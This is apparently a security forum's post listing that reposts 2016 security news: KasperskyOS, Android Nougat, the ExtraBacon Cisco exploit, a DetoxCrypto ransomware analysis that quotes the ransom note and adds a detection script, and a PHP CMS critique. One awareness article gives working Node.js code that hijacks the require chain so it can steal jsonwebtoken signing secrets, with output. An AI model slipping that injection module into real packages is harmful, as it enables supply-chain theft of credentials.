Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. Kaspersky has made its own operating system

     by unacomn on 24/08/2016

     For most of the last few years there have not been all that many operating systems, at least not in terms of the technology they are based on. Building one from scratch is a long and difficult process, so they do not appear overnight. But after four years of work, Kaspersky seems to have built one.

     Kaspersky Labs has built its own operating system, KasperskyOS, constructed from the ground up using its own technology, without being based on Unix, Linux, Windows or any other existing software. The operating system was built with security in mind, which is why its first application is in routers made by the company Kraftway, intended for the industrial sector, government institutions, hospitals and education.

     Being built on entirely new technology, KasperskyOS is not as vulnerable from the start, and the principles it was built on try to reduce the impact a malware attack can have on the system. Not to mention the benefits of the absence of a backdoor that may or may not have been present for years in every other operating system.

     The operating system does not allow running processes to communicate anonymously, does not allow them to step outside what the security policy has assigned to them, and in general is designed not to let malware run wild, even if it manages to get installed.

     Full details about this operating system should be available in the near future. If you want to learn more about the technology, you can take a look at the general plan from a few years ago. It is not known whether there will also be a desktop version, but given how many fans Microsoft has in Russia and the rest of the world since Windows 10, the possibility of KasperskyOS making it onto PCs someday is not ruled out. Not right away, because turning a specialised operating system into one for the ordinary user is a harder process, as Linux keeps demonstrating, but someday. [The Register]

     Source: https://zonait.tv/kaspersky-a-facut-propriul-sistem-de-operare/
  2. Android 7.0 Nougat is out, with new security features

     Zeljka Zorz - Managing Editor, August 23, 2016

     Google has released Android 7.0 Nougat, and the newest version of the popular mobile OS is already being rolled out to Google’s existing Nexus devices.

     “Today, and over the next several weeks, the Nexus 6, Nexus 5X, Nexus 6P, Nexus 9, Nexus Player, Pixel C and General Mobile 4G (Android One) will get an over the air software update to Android 7.0 Nougat. Any devices enrolled in the Android Beta Program will also receive this final version,” Sameer Samat, VP of Product Management, Android & Google Play, explained on Monday.

     The LG V20, to be released in September, will be the first smartphone to come equipped with Android Nougat right out of the box.

     New Android 7.0 Nougat security features

     The new OS version brings many changes, including new security features for individual and enterprise users.

     Google is set to release newer Nexus devices in the fall. For them, new features will include seamless updates, file-based encryption, and Direct Boot.

     Direct Boot is meant to help apps run securely even before users unlock their device when the device reboots. If the reboot happens and users don’t notice (and therefore aren’t logged in), Secure Boot will make sure that the apps start working as soon as the phone finishes booting (i.e. before users sign in). For more details about the feature, go here and here.

     By encrypting at the file level, Nougat will better isolate and protect files for individual users on their device.

     “New Android devices with Nougat can install software updates in the background which means you won’t have to wait while your device installs the update and optimizes all your apps for the new version,” Samat explained. Current Nexus users won’t get seamless updates, but Google promises that Android Nougat will bring them faster software update installs.

     Nougat also comes with restricted permission sharing between apps, restricted manoeuvring space for apps with device admin permissions (they can’t change users’ PINs or passwords) and more user control over this type of app (users will be able to easily uninstall them).

     For enterprise users, Nougat will bring the “always-on VPN” feature, which will enforce secure connections and sharing; a better and clearer separation between private and work-specific Android profiles; a new QR code-based device provisioning option; and more.

     As always, users will be able to peruse and set the optional security features through the device’s Settings app.

     Source: https://www.helpnetsecurity.com/2016/08/23/android-7-0-nougat-security-features/
  3. NSA-linked Cisco exploit poses bigger threat than previously thought

     With only a small amount of work, ExtraBacon will commandeer new versions of ASA.

     DAN GOODIN - 8/23/2016, 9:09 PM

     Recently released code that exploits Cisco System firewalls and has been linked to the National Security Agency can work against a much larger number of models than many security experts previously thought.

     An exploit dubbed ExtraBacon contains code that prevents it from working on newer versions of Cisco Adaptive Security Appliance (ASA), a line of firewalls that's widely used by corporations, government agencies, and other large organizations. When the exploit encounters 8.4(5) or newer versions of ASA, it returns an error message that prevents it from working. Now researchers say that with a nominal amount of work, they were able to modify ExtraBacon to make it work on a much newer version. While Cisco has said all versions of ASA are affected by the underlying vulnerability in the Simple Network Messaging Protocol, the finding means that ExtraBacon poses a bigger threat than many security experts may have believed.

     SilentSignal

     The newly modified exploit is the work of SilentSignal, a penetration testing firm located in Budapest, Hungary. In an e-mail, SilentSignal researcher Balint Varga-Perke wrote:

         We first started to work on the exploit mainly to see how easy it would be to add support for other (newer) versions. Turns out it is very easy, that implies two things:
         - The leaked code is not as poor quality as some might suggest
         - The lack of exploit mitigation techniques in the target Cisco software makes the life of attackers very easy

     As Ars previously reported, the zero-day exploit allows remote attackers who have already gained a foothold in a targeted network to take full control of a firewall. It was one of more than a dozen highly advanced attacks that was part of a mysterious leak by a previously unknown group calling itself the ShadowBrokers. Researchers say digital fingerprints left inside the code all but prove the attacks belonged to the Equation Group, an elite hacking crew with ties to the NSA-sponsored Stuxnet and Flame malware that targeted Iran and the Middle East.

     Michael Toecker, an engineer at a firm called Context Industrial Security, has analyzed ExtraBacon and found that it was designed to work only with versions 8.4(4) and earlier of ASA. He provided the following screenshot to illustrate the restrictions.

     [Screenshot: Michael Toecker]

     The success of the modified exploit "demonstrates just how persistent a vulnerability in code can be, how it moves into new versions unless it's found and eradicated," Toecker told Ars. "I don't know who built ExtraBacon, but thousands of users in the US are now vulnerable to the same exploit because nobody told Cisco their SNMP code was busted, and the vulnerable code continued into later versions."

     Toecker went on to say that the vulnerability of later ASA versions likely didn't take Cisco by surprise. Near the bottom of a post that Cisco published last week in response to the ShadowBrokers leak, the company's principal engineer, Omar Santos, reported that ExtraBacon caused ASA version 9.4(1) to seize up and stop working. Such crashes are often the first sign of a bug that, when properly exploited, allows an attacker to remotely execute malicious code. Cisco engineers have released software that allows ASA customers to detect and stop ExtraBacon-powered attacks, but the company has yet to actually patch the underlying bug.

     The ShadowBrokers release means that advanced attacks can be carried out by a much wider base of hackers than would normally be possible.

     "We have test equipment and custom firmware images that make debugging easier," Varga-Perke of SilentSignal said. "These are most likely available for malicious parties, too; we are quite confident that similar code exists in private hands."

     As Ars and Cisco have noted previously, the ExtraBacon exploit requires attackers to already have compromised parts of a targeted network. That requirement and the bar Varga-Perke described for modifying ExtraBacon means it's probably prohibitively difficult for script kiddies to exploit newer versions of ASA. Still, for more talented hackers, there's no longer any debate. People running ASA should make sure they've installed last week's exploit signature and the upcoming patch as soon as it's available.

     DAN GOODIN
     Dan is the Security Editor at Ars Technica, which he joined in 2012 after working for The Register, the Associated Press, Bloomberg News, and other publications. EMAIL dan.goodin@arstechnica.com // TWITTER @dangoodin001

     Source: http://arstechnica.com/security/2016/08/nsa-linked-cisco-exploit-poses-bigger-threat-than-previously-thought/
  4. Linux at 25: An ecosystem, not only an OS

     InfoWorld celebrates the 25th birthday of Linux -- and the new generation of open source projects Linux enabled

     InfoWorld | Aug 22, 2016 (Image credit: PCbots)

     I discovered Linux the way most people did, through word of mouth in the 1990s, when rumors spread of a free "hobbyist" OS designed to run on x86 PCs. For the first decade of Linux's 25 years, Linux was largely a curiosity outside of its core community. I'm proud to say InfoWorld was among the first publications to take Linux seriously, culminating in a January 2004 review entitled "Linux 2.6 scales the enterprise." In it, InfoWorld contributing editor Paul Venezia issued a fateful warning: "If commercial Unix vendors weren’t already worried about Linux, they should be now."

     Today Linux has expanded far beyond its conquest of the server market. If you include Android, which is built around the Linux kernel, not to mention embedded Linux devices from TVs to network switches, you're talking billions of instances. This week on InfoWorld, you'll see a string of articles celebrating Linux, including a feature article from Paul, plus his interview with Linux creator Linus Torvalds. Those two stories will run on Aug. 25 -- the same date on which Torvalds first announced Linux in 1991.

     Over the years, Linux has grown in another way: The sheer scale of its community development operation. Jim Zemlin, executive director of the Linux Foundation, recently offered me some awe-inspiring stats:

         There are 53,000 source files in the Linux kernel, 21 million lines of code. There are 3,900 developers from all around the globe, 10,800 lines of code are added, 5300 lines of code are removed and 1,800 lines of code are modified every single day in the Linux kernel. It changes seven, eight times an hour on average, every day, 365 days a year. That is a prolific, tremendous scale that is just unparalleled in the history of software development.

     That's the kernel alone. Zemlin reminds us that the versioning and repository system Git, on which GitHub is based, was created by Torvalds to help manage this massive development effort. Each rev of the kernel, offered under the GPLv2 license, flows to the multitude of Linux distributions, the providers of which are responsible for the customer experience.

     Given that Linux providers pay nothing for the kernel, how does Torvalds earn a living? He's an employee of the Linux Foundation, as is a coterie of core contributors and administrators, but they're far outnumbered by a much larger group of dedicated developers employed by familiar names: Intel, Red Hat, Samsung, Suse, IBM, Google, AMD, and many more. This consortium supplies both monetary support to the Foundation and millions of lines of code to the Linux project.

     Although Torvalds technically reports to Zemlin, the latter invokes his daughter to describe their relationship: "Like my daughter, who shares a lot in common with Linus, they’re both adorable, they both are brilliant, and neither of them listens to anything I say."

     As you can tell, Zemlin likes to minimize his own role, going as far as to say, "I'm just the janitor keeping the wheels turning." But it's impossible to ignore the growing importance of the Foundation itself -- and its 50 open source projects beyond the Linux kernel, a number of them vital to the future of enterprise computing.

     Take the Linux Foundation's Open Container Initiative (OCI). It's fair to say that no new enterprise technology over the past couple of years has had a greater impact than Docker packaging for Linux containers, and the OCI is the cauldron where those specs are being hashed out. Alongside the OCI, the Cloud Native Computing Foundation promises to harmonize container management and orchestration solutions for the next-gen enterprise cloud, with Google's red-hot Kubernetes at the core.

     Zemlin is particularly excited by the Foundation's new, fast-growing Hyperledger project, a blockchain-based initiative to create an open, enterprise-grade distributed ledger system for all sorts of transactions. "Blockchain has the potential to change the nature of trusted transactions on the internet," he says. "Beyond that, it’s a security modality for connected devices where you have a trusted, immutable record of cryptographically secure trust on the internet. It’s a huge project."

     The sheer breadth of open networking projects also demands attention. Together you can view them as circumscribing the future of networking: OpenDaylight, Open Network Operating System, Open Orchestrator Project, Open Platform for NFV, Open vSwitch, and OpenSwitch.

     As Linux turns 25, it's worth pondering not only the impact of the endlessly morphing, proliferating OS itself, but its role in legitimizing open source and elevating it to the point where, today, it has become ground zero for technology development. Linux has its rich ecosystem of contributors, providers, and users of all stripes. But around that, supported by the Linux and Apache Foundations and others, a vast constellation of auspicious open source projects has arisen, each with its own potential to shake up enterprise computing. Rather than wandering in the wilderness for a decade, the best of them are already being taken seriously.

     Eric Knorr — Editor in Chief
     Eric Knorr is the editor in chief for InfoWorld and has been with the publication since 2003. Eric has received the Neal and Computer Press Awards for journalistic excellence.

     Source: http://www.infoworld.com/article/3109891/linux/linux-at-25-an-ecosystem-not-only-an-os.html
  5. ERNW Hardening Guide: OS X 10.11 El Captain

     Table of Content

       - Introduction
       - Authentication
           - Ensure Security of Standard and Default Accounts
           - Users Privilege Separation
           - Ensure Password Security
           - Enforce Password Security
           - Two Factor Authentication
           - Automatic Login and User Lists
           - Guest Accounts
           - Restrict Sudoers file
           - Automatically Lock the Login Keychain
       - General Configuration
           - Gatekeeper
           - Disable Diagnostics
           - Disable Handoff
           - Tracking Services
           - FileVault
           - Firewall
           - Require Administrator Password
           - Screensaver and Un-locking
           - Filename Extensions
           - System Updates
           - Prevent Safari from Opening Known File Types
           - Set Strict Global Umask
       - Technical Configuration
           - Disable Bluetooth
           - Firmware Password
           - Setuid and Setgid
           - Disable Core Dumps
       - Network and Communication Security
           - Advanced Firewall
           - Disable Wake on Lan
           - Disable Apple File Protocol (AFP)
           - Disable Unnecessary Services
           - Disable Sharing
           - Harden TCP/IP Kernel Parameters
           - Enable Network Time Synchronization via NTP
           - Disable Bonjour (mDNS)
       - Recommended Applications
           - Little Snitch
           - Micro Snitch
           - BlockBlock
           - Lockdown
           - RansomWhere?
           - Dylib Hijack Scanner
           - Lynis

     Introduction

     ERNW has compiled the most relevant settings for OS X 10.11 El Captain into this compilation of security recommendations. This document is supposed to provide a solid base of hardening measures to enhance the system security while still remaining commonly applicable. Settings which might have severe impact on the functionality of the operating system and need a lot of further testing are not part of this checklist or are marked as optional.

     We have marked each recommended setting in this checklist either with “mandatory” or “optional” to make a clear statement of which setting is a MUST (mandatory) or a SHOULD (optional) from our point of view. “Optional” also means that we recommend applying this setting, but there may be required functionality on the system that will become unavailable once the setting is applied.

     Important: This guide will force you to disable SIP (System Integrity Protection) a few times. After the hardening is done, please make sure you enable SIP again.

     Full article: https://github.com/ernw/hardening/blob/master/operating_system/osx/10.11/ERNW_Hardening_OS_X_EL_Captain.md
  6. New DetoxCrypto Ransomware pretends to be PokemonGo or uploads a Picture of your Screen

     By Lawrence Abrams

     A new ransomware called DetoxCrypto has been discovered by MalwareHunterTeam that is currently being distributed under two different variants. The first variant looks like a generic ransomware but contains the interesting feature of taking a screenshot of your active Windows screen when it is installed. The second variant is trying to take advantage of the immense popularity of PokemonGo, by hoping to trick people into installing it.

     This ransomware appears to be either part of an affiliate system or being sold on darkweb sites as we are seeing different variants, with different themes, email addresses, and features. For example, one variant has a Pokemon theme, while another has a more generic ransom note, but takes a picture of your active Windows screen when it is installed.

     All variants will encrypt your data using AES encryption, stop MySQL and MSSQL services, display a ransom note/lock screen, and play an audio file while the lock screen is showing. In order to pay the ransom, victims are instructed to contact an email listed in the lock screen for payment instructions.

     Anatomy of the DetoxCrypto Ransomware

     It is currently not known how this ransomware is distributed, but so far the variants we have observed all use a single distributed executable that contains other executables and files embedded within it. When the main distribution executable is run, it will extract a file called MicrosoftHost.exe, an audio file, a wallpaper background, and a third executable, whose name varies per variant of DetoxCrypto.

     The MicrosoftHost.exe executable performs the actual encryption of the drive and stops the database servers on the victim's computer. When encrypting files it will not append a different extension to them. It will also configure the Windows desktop background to use the embedded image file that is extracted.

     The third file, which we have seen named Calipso.exe and Pokemon.exe, displays the lock screen, plays an audio file, and provides the ability to decrypt a victim's files if the correct password is entered. This file appears not to be static between each variant that we noticed, so it is possible that different distributors customize this file to perform their own desired tasks.

     The two different variants we have seen so far are a Pokemon theme and a generic looking one, with an interesting screen capture routine. Both of these are described further below.

     Calipso Variant

     The Calipso variant of DetoxCrypto was discovered by Intel security researcher Marc Rivero López. When run it will extract numerous files to the C:\Users\[account_name]\Calipso folder as shown below.

     [Image: Calipso folder]

     The ransomware will then encrypt the victim's computer, display a lock screen, and play some music. The lock screen will instruct the victim to email motox2016@mail2tor.com in order to get payment instructions. A video of the lock screen and audio can be seen above.

     When this ransomware is executed, it will also take a screenshot of the active screen and upload it to the developer.

     [Image: Screen capture function]

     It is possible that based on what is contained in the screenshot, the ransomware developer may try to increase the price of the ransom if the image contains blackmail worthy content.

     We are all Pokemons Variant

     [Image: Pokemon background]

     The Pokemon themed variant of DetoxCrypto is distributed as an executable called Pokemongo.exe. When executed the ransomware will extract numerous files to the C:\Users\[account_name]\Downloads\Pokemon folder as shown below.

     [Image: Pokemon folder]

     The ransomware will then encrypt the victim's computer, display a lock screen, and play some music. The text of the lock screen is:

         We are all Pokemons
         YOUR DOCUMENTS, PHOTOS, DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED AND A UNIQUE UNLOCK KEY IS GENERATED !!
         YOU CAN ONLY UNLOCK YOUR FILES BY BUYING THIS KEY FROM US, THERE IS NO OTHER WAY TO SAVE OR UNLOCK YOUR FILES !!
         HOW TO UNLOCK MY FILES ?
         You need to send 2 Bitcoins to our Bitcoin Wallet address. To get the Wallet address contact us at : contact365@mail2tor.com
         WE RECOMMEND TO BUY BITCOINS HERE : WWW.LOCALBITCOINS.COM
         Register and buy Bitcoins with PayPal, Skrill or find someone who sells Bitcoins Locally by entering your City and select CASH in person as Your paying option.
         TO SAVE TIME YOU CAN GIVE THE SELLER OUR BITCOIN ADDRESS AND HE CAN SEND THE BITCOINS TO US DIRECTLY.
         AFTER WE RECEIVE THE PAYMENT WE WILL SEND YOU THE UNLOCK KEY TO THE EMAIL YOU CONTACTED US FROM.
         ** Act fast because ALL YOUR FILES WILL BE DELETED IN 96h **
         ** IF YOU DELETE THIS PROGRAM ALL YOUR FILES WILL BE DELETED FOREVER **

     The lock screen for this variant can be seen below.

     [Image: Pokemon lock screen]

     LAWRENCE ABRAMS
     Lawrence Abrams is the creator and owner of BleepingComputer.com. Lawrence's area of expertise includes malware removal and computer forensics. Lawrence Abrams is a co-author of the Winternals Defragmentation, Recovery, and Administration Field Guide and the technical editor for Rootkits for Dummies.

     Source: http://www.bleepingcomputer.com/news/security/new-detoxcrypto-ransomware-pretends-to-be-pokemongo-or-uploads-a-picture-of-your-screen/
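     The behaviours the article names (a dropped MicrosoftHost.exe under a user profile, a staging folder called Calipso or Downloads\Pokemon, and the MySQL/MSSQL services being stopped) can be turned into a simple host-level correlation. The following is an added example written for this post, not code from BleepingComputer or from the malware analysis; the event record format, field names and the sample events are constructed, and a host is only flagged when both the executable drop and a database-service stop are seen, so a lone service restart by an administrator does not fire.

```javascript
'use strict';
// Added example (not from the BleepingComputer article): correlate constructed
// endpoint events against the DetoxCrypto behaviours the article describes.
// Event shape ({host, type, path|service}) is an assumption for this example.

const DROPPED_EXE = 'microsofthost.exe';                     // named in the article
const STAGING_DIRS = ['\\calipso\\', '\\downloads\\pokemon\\']; // folders named in the article
const DB_SERVICES = ['mysql', 'mssqlserver'];                 // services the ransomware stops

// Map one event to an indicator name, or null when it is not interesting.
function classify(ev) {
  if (ev.type === 'file_create') {
    const p = String(ev.path).toLowerCase();
    const underProfile = p.startsWith('c:\\users\\');
    if (underProfile && p.endsWith('\\' + DROPPED_EXE)) return 'dropped_host_exe';
    if (underProfile && STAGING_DIRS.some((d) => p.includes(d))) return 'staging_dir';
  }
  if (ev.type === 'service_stop' && DB_SERVICES.includes(String(ev.service).toLowerCase())) {
    return 'db_service_stop';
  }
  return null;
}

// Collect indicators per host and flag only the combination that the article
// attributes to MicrosoftHost.exe: the drop plus the database-service stop.
function correlate(events) {
  const perHost = new Map();
  for (const ev of events) {
    const ind = classify(ev);
    if (!ind) continue;
    if (!perHost.has(ev.host)) perHost.set(ev.host, new Set());
    perHost.get(ev.host).add(ind);
  }
  const findings = [];
  for (const [host, inds] of perHost) {
    if (inds.has('dropped_host_exe') && inds.has('db_service_stop')) {
      findings.push({ host, indicators: [...inds].sort() });
    }
  }
  return findings;
}

// Constructed sample telemetry (not real data). ws02 is a benign DBA restart,
// ws03 only shows the Pokemon-themed dropper landing in Downloads.
const SAMPLE_EVENTS = [
  { host: 'ws01', type: 'file_create', path: 'C:\\Users\\alice\\Calipso\\MicrosoftHost.exe' },
  { host: 'ws01', type: 'file_create', path: 'C:\\Users\\alice\\Calipso\\wallpaper.jpg' },
  { host: 'ws01', type: 'service_stop', service: 'MySQL' },
  { host: 'ws02', type: 'service_stop', service: 'MSSQLSERVER' },
  { host: 'ws03', type: 'file_create', path: 'C:\\Users\\bob\\Downloads\\Pokemon\\Pokemongo.exe' },
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(correlate(SAMPLE_EVENTS), null, 2));
}
```

     Running it prints a single finding for ws01 with all three indicators. Because the article notes that encrypted files keep their original extension, an extension-based file monitor would not see this family, which is why the correlation keys on the dropper and the service stops instead.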
  7. One easy way to inject malicious code in any Node.js application

     Posted on August 22, 2016

     tl;dr

     This article describes a method of injecting arbitrary code in Node.js modules. It does not encourage unethical behavior.

     The chain used to include instances of modules can be tampered with to allow modification of required dependencies. Knowing this fact, a malicious attacker would be able to craft a module that can modify legitimate code. This malicious code could then be shipped as part of a widely used module on the NPM registry and any `require` call made after the first instantiation of the malicious module would be vulnerable to a potential code injection.

     However, the method described in this article can also be used legitimately in some situations such as code coverage calculation, mocking or instrumentation.

     Programmers have to take the time to look at the sources of 3rd party libraries they are using in order to know what to expect.

     Definitions

       - “require chain”: the code executed between a call to the `require` function and the return statement of this function.
       - “module”: a set of code that can be instantiated in a runtime using the `require` function.
       - “core module”: a module available from the Node.js standard library.
       - “external module”: a module downloaded from a registry such as NPM.
       - “internal module”: a module existing only from within the current project and instantiated using `require` and a relative or absolute path to the module’s location.
       - “main module”: the entry point of a Node.js application. It is the file passed as an argument to the `$ node` executable.

     Introduction

     I have recently been given the task of finding a way to instrument all functions declared within a Node.js application. I came up with the following approaches:

       1. Create an addon to V8 to track all functions.
       2. Add hooks to any method that triggers asynchronous operations, and update the code before its execution.
       3. Change the behavior of the `require` function to patch code at instantiation time.

     The first method would require a fair amount of low-level programming and would probably not be portable to other Node.js runtimes such as ChakraCore.

     Hooking all asynchronous core methods is definitely possible (it will be even easier in the future with the release of “async_wrap” by the tracing working group). However, if the behavior of a code chunk is modified, the modification needs to be reapplied each time the chunk is seen in the event queue, which could lead to severe performance loss.

     Hijacking the require chain is not common, but there are still quite a few modules that use this strategy. How it works is that all modules required through `require` are patched at instantiation time. The major drawback of this method is that the main module of the application can’t be instrumented.

     I decided to go with hijacking the require chain, since it has the fewest disadvantages, and another solution would be attempted later for instrumenting the main module.

     The require chain

     The Node.js require chain is based on the core module named “Module”.

     [Figure: A simplified view of the require chain]

     Module names can represent one of three things:

       - a core module name
       - the name of a module in the path (i.e. within the “node_modules” directory)
       - a relative path to a local file

     There are also three outcomes to a successful call to `require`:

       - the module is already cached, so the cached version is returned. Because of this, calls to `require` are singletons.
       - the module is a core module, so a precompiled version is returned. (Core modules have their own cache space.)
       - the module is not in the core, so the “_compile” method will run the code from the required file using the core module named “vm”, cache the result, and return it.

     Hijacking the require chain

     The require chain can be hijacked in various locations. I decided to do it at the “_compile” level, and have released a module called “compile-hook”. Its source code is pretty simple and can be found here (compile-hook.js):

         'use strict';

         const Module = require('module');

         // keep a reference to the original loader so it can still be called
         const originalCompile = Module.prototype._compile;

         // default hook: pass the source through unchanged
         const nohook = function (content, filename, done) {
             return done(content);
         };

         let currentHook = nohook;

         // every non-core module goes through here before it runs
         Module.prototype._compile = function (content, filename) {
             const self = this;
             currentHook(content, filename, (newContent) => {
                 newContent = newContent || content;
                 originalCompile.call(self, newContent, filename);
             });
         };

         const placeHook = function (hook) {
             currentHook = hook;
         };

         const removeHook = function () {
             currentHook = nohook;
         };

         module.exports.placeHook = placeHook;
         module.exports.removeHook = removeHook;

     The “_compile” method is monkeypatched to add a transformation step to the code before instantiation.

     Injecting malicious code

     The “jsonwebtoken” module is a pretty popular package for managing authentication with JWT, so we will use it as an example to demonstrate how we can inject code into this module to steal the secret keys used to sign tokens. Here is a simple malicious module I created earlier (exploic.js):

         'use strict';

         const Hook = require('compile-hook');
         const Acorn = require('acorn-jsx');
         const Falafel = require('falafel');

         // rewrite the source of sign.js: add a stream to its exports and push
         // the signing key into it whenever sign() is called
         const hijack = function (script) {
             return Falafel(script, { parser: Acorn }, function (node) {
                 if (node.type === 'AssignmentExpression' && node.source().includes('module.exports')) {
                     node.update('var hackerStream = new require(\'stream\').PassThrough();\n' +
                         node.source() +
                         '\nmodule.exports.hackerStream = hackerStream;' + '\n');
                 }
                 if (node.source() === 'options = options || {};') {
                     node.update(node.source() + '\n' + 'hackerStream.push(secretOrPrivateKey)');
                 }
             });
         };

         Hook.placeHook((content, filename, done) => {
             if (filename.includes('/sign.js')) {
                 done(hijack(content));
             }
             else {
                 done();
             }
         });

         const jwt = require('jsonwebtoken');

         jwt.sign.hackerStream.on('data', (raw) => {
             console.log('secret', raw.toString());
         });

     And an example of an unfortunate victim application (victimpoc.js):

         'use strict';

         require('@vdeturckheim/exploic');
         const jwt = require('jsonwebtoken');

         const token = jwt.sign({ foo: 'bar'}, 'shhhhh');
         console.log(token);

     The output of this app is as follows:

         $ node index.js
         secret shhhhh
         eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJpYXQiOjE0NjQ4OTQ5Mjh9.LvIWJiFCamu8azvnNgh8VvleVZUETNvDZRon1tKBImU

     As you can see, the secret key given to the `sign` function is intercepted by the malicious module and printed to the console:

         secret shhhhh

     We merely display the secret here, but a real malicious script could post the secret keys to a remote server such as Pastebin.

     Conclusion

     Regarding the Sqreen Node.js agent, I ended up using a slightly different strategy than the one described in this article: the exported methods of the instrumented modules are not modified but wrapped. The wrapper is given the responsibility of the instrumentation and the original code stays untouched.

     This article is mainly aimed at raising awareness within the Node.js community of this potentially malicious technique. We demonstrate that hijacking the require chain is pretty easy, and can lead to severe security issues in Node.js applications. Even if countermeasures are created, programmers should always take the time to manually look at the source code of any external dependencies they download from public registries. Any time source code or executable binary data is downloaded and run on a machine, it can potentially lead to security issues.

     Some modules hijack the require chain for legitimate reasons. For instance:

       - “njsTrace” instruments function calls this way.
       - the “lab” test runner uses this method to compute code coverage.

     There is no easy way to prevent this technique from being used; the only simple solution is to carefully review each dependency and wisely choose which third party modules you use in your projects.

     Feel free to send me any comments and remarks regarding this article. We are also soon releasing our private beta for Sqreen! Please let me know if you’re interested in being a beta tester.

     Thanks for reading,
     Vladimir

     Vladimir is a software engineer at Sqreen.io with a background in cyber-security. He is involved in diverse open-source projects in JavaScript (mostly within the hapijs project) and has recently contributed to the Node.js core. He is currently working at Sqreen and is responsible for the Node.js instrumentation.

     Source: https://blog.sqreen.io/one-easy-way-to-inject-malicious-code-in-any-node-js-application/?utm_source=social&utm_medium=twitter&utm_campaign=sumome_share
  8. On the (in)security of popular open source Content Management Systems written in PHP

     August 24, 2016 3:02 am by P.I.E. Staff

     Our previous post included a checklist comparing CMS Airship (our Free Software CMS platform designed with security in mind) to the three most popular content management systems currently in use on the Internet:

       - WordPress (26.6% of all websites)
       - Joomla (2.8% of all websites)
       - Drupal (2.2% of all websites)

     The checklist compared out-of-the-box security properties (features or design decisions that affect the security of the software and any extensions developed for it) rather than what's possible with community-provided extensions. Tooltips were also provided on individual cells to clear up any confusion on why we did or did not award a checkmark to a given project for a given security property.

     Since the previous post was published, several technologists asked us to explain the individual security deficits of other PHP content management systems in detail. Some of these are straightforward (e.g. WordPress doesn't offer encryption, so there's nothing to analyze), but others require a careful eye for code auditing. Familiarity with PHP security is also greatly beneficial to understanding, although we will attempt to explain each item in detail.

     We're going to set Airship aside for the remainder of this post. All you need to know is Airship met all of the criteria for a secure-by-default content management system. If you'd like to learn more about Airship's security features, we've covered this in detail here.

     WordPress, Joomla, and Drupal: The Good Parts

     All three content management systems score points for being Free Software, released under the GNU Public License. Consequently, their source code is available for their users to inspect and analyze. This offers three benefits:

       - Independent security experts can assess the security of their offering and, with source code citations to prove their arguments, explain what's secure or insecure.
       - Independent security experts can take their findings and offer better ways to improve the security of their software.
       - You have the ability to run a copy of the software that you've verified to be known-good.

     For example, last year, we made WordPress's wp_rand() function cryptographically secure as of WordPress 4.4.0. This would not have been possible without the first two properties.

     In addition to being open source, all three provide a security mechanism to mitigate Cross-Site Request Forgery attacks. We didn't include whether or not plugins/extensions fail to utilize the CSRF mitigation feature in our analysis. If you're using a third-party plugin, don't assume that CSRF vulnerabilities can't or won't happen to your application just because there's a mitigation feature in the core.

     Drupal: Context-Aware Output Escaping

     The correct way to prevent cross-site scripting vulnerabilities is to escape data on output, not on input. Escaping on input can lead to bizarre exploitation strategies, e.g. WordPress's stored XSS vulnerability enabled by MySQL column truncation. You should be saving the original, unaltered copy of any data in case you need to update your escaping strategy to prevent a filter bypass. Escaping on output allows you a measure of agility that input escaping does not. You may, however, cache the escaped data for subsequent requests to improve your application's performance.

     The latest versions of Drupal got this right, and should be commended for it.

     Joomla: Secure Password Storage and Two-Factor Authentication

     Out of the three, Joomla is the only CMS that leverages PHP's native password hashing features. This means that cracking the passwords stored in a modern Joomla app is nontrivial, should one ever be compromised.
Additionally, Joomla now provides two-factor authentication out-of-the-box, which helps mitigate the consequences of weak user passwords. Joomla: Secure PHP Encryption In response to our security advisory about JCrypt's design flaws last year, the Joomla team adoptedDefuse Security's secure PHP encryption library (version 1.2.1) instead. While version 2 offers significant improvements over version 1, there are no known security vulnerabilities in that version of Defuse Security's PHP encryption library. The Bad and the Ugly Security Deficits in WordPress's Core WordPress Automatic Updates Are Not Secure WordPress is the only one of the big three content management systems that offers automatic updates, but it does so insecurely. In order to have secure automatic updates, you need to have a secure code delivery system in place. Secure code delivery has three properties: Cryptographic signatures: The deliverable was signed by a private key and you can verify the signature with the corresponding public key. Reproducible builds: You can reproduce the deliverable from the source code. Userbase consistency verification: Everyone gets the same thing. Implementations involve append-only data structures, such as Merkle trees, which are also used in certificate transparency and Bitcoin. WordPress's automatic updates are not cryptographically signed with (an offline) private key. This means if an attacker can compromise their update servers and upload a malicious download, they can install a trojan on 26.6% of the websites on the Internet. The consequences of a compromise of this magnitude cannot be understated. Such an attack could enable financial information fraud and distributed denial of service attacks on a scale we've never seen before, and that our systems are almost certainly incapable of enduring. 
Nothing stops an attacker from silently distributing malware through a compromised update server only to targets of interest, since there are no userbase consistency verification protocols in place either. However, given that WordPress is open source and PHP is an interpreted language, it's fair to give them credit for reproducible builds. WordPress Does Not Use Prepared Statements Many WordPress users are surprised to learn that WordPress doesn't use prepared statements, given the existence of wpdb::prepare(). To understand what's going on, you first need to know what prepared statements actually do: The application sends the query string (with placeholders) to the database server. The database server responds with a query identifier. Some servers allow you to cache and reuse query identifiers for multiple prepared queries to reduce round trips. The application sends the query identifier and the parameters together to the server. The reason this is a security boon over escape-then-concatenate is that the query string is never tainted by the parameters. They're sent in separate packets. This is an important distinction;Unicode-based hacks to bypass mysql_real_escape_string() are dead on arrival when prepared statements are used. What WordPress's wpdb::prepare() does instead of prepared statements is escape-then-concatenate. WordPress Salted MD5 for Password Hashing WordPress users may be surprised to learn that, despite using Phpass (a well-regarded password hashing library written by Solar Designer which offered bcrypt before PHP got a native password hashing API), WordPress doesn't use bcrypt for password storage. To understand why, first pay attention to this code snippet and this one as well. If $this->portable_hashes is set to TRUE, it will call $this->crypt_private() (which uses 8192 rounds of MD5). Where is $this->portable_hashes defined? In the constructor. And, of course, it's always set toTRUE when an object is created in the WordPress core. 
